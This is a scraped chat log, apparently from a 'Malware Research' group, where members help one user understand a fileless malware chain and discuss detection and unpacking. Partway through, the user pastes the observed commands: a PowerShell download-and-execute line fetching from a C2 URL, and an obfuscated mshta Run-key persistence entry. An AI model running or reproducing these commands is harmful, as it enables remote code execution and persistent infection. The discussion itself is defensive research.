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Malware Research

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Malware Research

otherwise, the lazy/confidential way would be to go to Malpedia and search for the malware name and read through the reports for its behaviours for detection

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Malware Research

If anyone is curious about this or tries to solve it, pls let me know as well.))

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Malware Research

I was able to analyze the part where it downloads and compiles C# code, but I couldn't manage the part after that

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Malware Research

"I was able to analyze the part where it downloads and compiles C# code, but I couldn't manage the part after that."

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Malware Research

Without which you can't analyze further?

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Malware Research

All starts with first one,

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Malware Research

I can’t paste it to here bot deleting it ))

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Malware Research

Can’t get things which is c# want download from c2

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Malware Research

But that's just the beginning. After understanding it, what is it that you want to do with the information is the next question...

You can research into a lot of things, but that path should lead to something that you want?

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Malware Research

May be it will be useful for you

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Malware Research


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Malware Research

Anyone can help for research? Fileless attack?

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Malware Research

Give this a shot, also try to just straight up 7z the pe.

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Malware Research

Hi Researcher , can unpack malware whose use exe4j to pack itself?

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Malware Research

Hello TK, welcome to the Malware Research group! Please read the pinned message before you post!

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Malware Research

the URL is dead, no samples are available. if you need help in analysis, please share the hash so someone else can download and assist you

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Malware Research

The detection part is completed. What I want to figure out is the malware's behavior. If the C# code is running, or if it has already run, what does it do? What are the next steps?

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Malware Research

Based on the pasted script...

A PowerShell script that connects to the Internet, which subsequently executes cmd and modifies the Run key?

Sigma rule can do that, but whether your tool can support this method of detection is another

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Malware Research

Want detect behavior this malware

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Malware Research

So you need the PowerShell script?

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Malware Research

All starts with this commands
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (&NeW-oBjeCt NEt.webClIeNT).doWnLoaDstRInG('[httP://]sToRKa.sTORe/Ps/06fCC253-fD2C-5a52-6f46-a0B42e64251c')|CMd

Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "_06fcc253fd2c5a526f46a0b42e64251c" /t REG_SZ /F /D "mShta VbscRiPt:closE(execUTe(\"cr\"+\"eAt\"+\"eO\"+\"Bj\"+\"ect\"+\"(\"\"\"+\"WS\"+\"CRI\"+\"pt\"+\".Sh\"+\"ELl\"+\"\"\").\"+\"Run\"+\" \"\"\"+\"%_\"+\"06\"+\"FC\"+\"C25\"+\"3F\"+\"D2\"+\"C5\"+\"a5\"+\"26\"+\"F4\"+\"6a\"+\"0B4\"+\"2e\"+\"642\"+\"51c\"+\"%\"\",\"+\"0\"))"

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Malware Research

I still don't get where the question is leading to

So you want a sample? Or know what kind of malware exhibits this behaviour? Or if you can detect such behaviour?

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Malware Research

All starts with one script , it’s connect to c2 server gets powershell scripts then runing it, then downloads another c# code , doing compail then c# code starts downloading another tool, I need research this malware

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Malware Research

I think if you input that into Google, you are going to get tons of definitions and common execution methods

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Malware Research

What do you need help on or interested in?

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Malware Research

No... I don't understand, and Google isn't helping

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Malware Research

Hello @nguyen_duyhung, welcome to the Malware Research group! Please read the pinned message before you post!

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Malware Research

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Malware Research

New FedBan
Fed: Libra's Empire
FedAdmin: ❤🦦
User: Александр
User ID: 1351806164
Reason: scam

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